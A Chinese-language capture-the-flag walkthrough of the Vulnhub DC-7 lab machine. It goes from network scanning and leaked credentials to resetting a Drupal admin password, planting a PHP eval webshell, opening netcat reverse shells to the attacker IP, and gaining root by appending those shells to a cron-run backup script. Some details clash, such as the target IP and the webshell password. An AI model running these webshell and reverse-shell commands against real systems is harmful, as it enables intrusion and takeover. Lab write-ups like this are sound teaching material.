Vulnhub靶机下载:
靶机下载
官网地址: https://download.vulnhub.com/dc/DC-7.zip
靶机文件下载后导入即可使用,靶机只有一个flag值
DC6靶机IP地址: 192.168.18.128
kali攻击机IP地址:192.168.18.102
①信息收集
#扫描存活主机
arp-scan -l
#nmap扫描开放端口信息
nmap -A -p- 192.168.18.101
开放端口22
,80
,我们进行网站登陆
DC-7引入了一些“新”概念,但我将把它们留给你自己去弄清楚。: -)
虽然这个挑战并不完全是技术性的,但如果您需要诉诸暴力强制或字典攻击,您可能不会成功。 你要做的,就是“跳出”思维定势。 “跳出”框框。:
-)
在主机上进行查询用户信息
下载文件后进行解压,在config.php
中发现有用信息 用户名dc7user
密码dc7user
②ssh远程登陆
gpg
是一种基于密钥的加密方式,使用了一对密钥对消息进行加密和解密
,来保证消息的安全传输格式是用来加密文件的。
如果这个文件可写,那么直接就可以反弹shell提权
了。使用ls -l
看一下权限,发现只有root和www-data
可写。
drush
是一个简化了创建和管理Drupal8网站的命令行工具,
参考文章 Drupal drush 常用命令
尝试使用这个模块里的命令 修改密码
进入目录 cd /var/www/html
修改admin用户的密码 drush user-password admin --password='123456'
用户名admin
密码123456
,登陆成功
④漏洞利用
在 Content – Add content --Basic page可以写入shell
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
点击install
后,点击Enable newly added modules
激活该模块
勾选PHP Filter
,拉到页面最下出进行安装install
安装成功界面
写入木马<?php @eval($_POST[123]);?>
在这里插入图片描述使用蚁剑连接成功连接shell http://192.168.18.101/node/8
,连接密码cmd
,权限较低
⑤反弹shell
#kali攻击机中进行监听
nc -lvnp 8888
#在哥斯拉终端
nc -e /bin/bash 192.168.18.128 8888
#交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
⑥用户提权
方法1
echo nc -e 192.168.18.128 2222 /bin/bash >> backups.sh
nc -lvvp 2222
方法2
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.18.128 1234 >/tmp/f" >> backups.sh
nc -lvvp 1234
由于脚本是每个15分钟
运行一次,坐等15分钟吧